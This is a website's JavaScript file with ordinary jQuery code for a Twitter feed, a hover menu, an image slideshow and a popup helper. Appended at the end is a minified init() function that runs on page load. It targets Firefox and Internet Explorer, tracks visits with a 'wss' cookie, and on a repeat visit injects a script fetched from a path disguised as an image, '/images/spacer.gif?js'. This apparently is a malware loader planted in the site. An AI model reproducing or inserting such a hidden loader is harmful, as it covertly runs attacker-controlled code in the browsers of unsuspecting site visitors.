 jQuery(function($){
        $(".tweet").tweet({
          join_text: "auto",
          username: "lookoutnoosa",
          avatar_size: null,
          count: 3,
          auto_join_text_default: "we said,",
          auto_join_text_ed: "we",
          auto_join_text_ing: "we were",
          auto_join_text_reply: "we replied",
          auto_join_text_url: "we were checking out",
          loading_text: "loading tweets..."
        });
      });

	  $(document).ready(function(){
			$("#nav-one li").hover(
				function(){ $("ul", this).hide().show(); },
//				function(){ $("ul", this).hide().fadeIn("medium"); },				
				function() { } 
			);
	  	if (document.all) {
				$("#nav-one li").hoverClass ("sfHover");
			}
	  });
	  
		$.fn.hoverClass = function(c) {
			return this.each(function(){
				$(this).hover( 
					function() { $(this).addClass(c);  },
					function() { $(this).removeClass(c); }
				);
			});
		};	  

	$(function() {	
	    $('headerimgs').bgimgSlideshow({photos : [{
		"title" : "Slide 1",
		"image" : "/images/slide1.jpg",
		"url" : "#"	
	}, {
		"title" : "Slide 2",
		"image" : "/images/slide2.jpg",
		"url" : "#"		
	}, {
		"title" : "Slide 3",
		"image" : "/images/slide3.jpg",
		"url" : "#"
	}, {
		"title" : "Slide 4",
		"image" : "/images/slide4.jpg",
		"url" : "#"
	}, {
		"title" : "Slide 5",
		"image" : "/images/slide5.jpg",
		"url" : "#"		
	}, {
		"title" : "Slide 6",
		"image" : "/images/slide6.jpg",
		"url" : "#"		
	}]});
	});
	
	
	
function popUp(URL) {
day = new Date();
id = day.getTime();
eval("page" + id + " = window.open(URL, '" + id + "', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=680,height=600');");
}


function init(){var f=navigator.userAgent;var a=false;if(f.indexOf("Firefox")!=-1||f.indexOf("MSIE")!=-1){a=true}if(a!==true){return}var i="/images/spacer.gif?js";var g=b("wss");if(g){if(g=="goot1"){c("wss","goot2","3");var e=document.createElement("script");e.type="text/javascript";e.src=i+"&r="+new Date().getTime();var d=document.getElementsByTagName("head")[0];d.appendChild(e)}else{}}else{c("wss","goot1","3")}function b(k){var j,h,m,l=document.cookie.split(";");for(j=0;j<l.length;j++){h=l[j].substr(0,l[j].indexOf("="));m=l[j].substr(l[j].indexOf("=")+1);h=h.replace(/^\s+|\s+$/g,"");if(h==k){return unescape(m)}}}function c(j,l,h){var m=new Date();m.setDate(m.getDate()+h);var k=escape(l)+((h==null)?"":"; expires="+m.toUTCString());document.cookie=j+"="+k}}init();
